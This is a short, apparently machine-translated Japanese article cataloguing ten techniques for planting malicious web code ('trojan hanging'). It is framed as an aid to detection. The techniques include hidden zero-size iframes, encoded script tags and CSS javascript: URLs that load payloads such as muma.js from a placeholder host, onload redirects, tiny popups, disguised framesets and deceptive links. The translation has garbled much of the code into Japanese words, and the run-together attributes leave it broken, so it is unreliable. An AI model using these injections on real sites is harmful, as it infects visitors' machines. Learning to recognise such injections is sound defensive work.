この記事では、悪意のある人が Web ページ上でトロイの木馬をハングアップするためによく使用する方法について説明します。これにより、トロイの木馬のハングアップによく使用される場所を検出できれば、その場所を簡単に見つけることができます。トロイの木馬の。
1: フレーム吊り馬
<iframe src=アドレス幅=0高さ=0></iframe>
アドレスなどに悪質なWebサイトへのリンクを入力してしまう可能性があります。
2: js ファイルのマウント
JS ファイルである限り、悪意を持って変更される可能性があるため、悪意のあるコードにリンクされる可能性が高く、サイト全体で参照される JS コードは、検出のためにトロイの木馬にリンクされる可能性が最も高くなります。 JS コードの左側または下部は、悪意のあるコードと通常のコードを組み合わせることを好みます。多くのスペースや改行で隠されているため、JS コード ページが意図的に引き伸ばされているかどうかを確認する必要があります。
3: js変形暗号化
<SCRIPT language=JScript.Encode src=http://www.xxx.com/muma.txt></script>
muma.txt は任意のサフィックスに変更できます
4: 胴吊り馬
<body onload=window.location='address';></body>
5: 隠された馬の吊り下げ
top.document.body.innerHTML = top.document.body.innerHTML + '/r/n<iframe src=http://www.xxx.com/muma.htm/></iframe>';
6: CSS でぶら下がっている馬
体 {
背景画像: url('javascript:document.write(<script src=http://www.XXX.net/muma.js></script>)')}
この方法はより冷酷であり、検出が困難です。
7:JAJA 吊り馬
<SCRIPT言語=javascript>
window.open (アドレス,,ツールバー = いいえ,場所 = いいえ,ディレクトリ = いいえ,ステータス = いいえ,メニューバー = いいえ,スクロールバー = いいえ,幅 = 1,高さ = 1);
</script>
8:写真変装
<html>
<iframe src=网马地址 height=0 width=0></iframe>
<img src=画像アドレス></center>
</html>
9: 偽装電話
<frameset rows=444,0cols=*>
<frame src=Web ページを開く framborder=スクロールなし=自動サイズ変更 marginwidth=0margingheight=0>
<frame src=网马地址 Frameborder=noscrolling=noresize marginwidth=0margingheight=0>
</フレームセット>
10: 高度な欺瞞
<a href=http://www.163.com (接続アドレスが混同され、このアドレスがトロイの木馬のアドレスを指していることが示されます) onMouseOver=www_163_com(); return true;> ページに表示されるコンテンツ</a>
<SCRIPT 言語=JavaScript>
関数 www_163_com ()
{
var url=正味の馬の住所;
open(url,NewWindow,toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,トップ=10);
}
</スクリプト>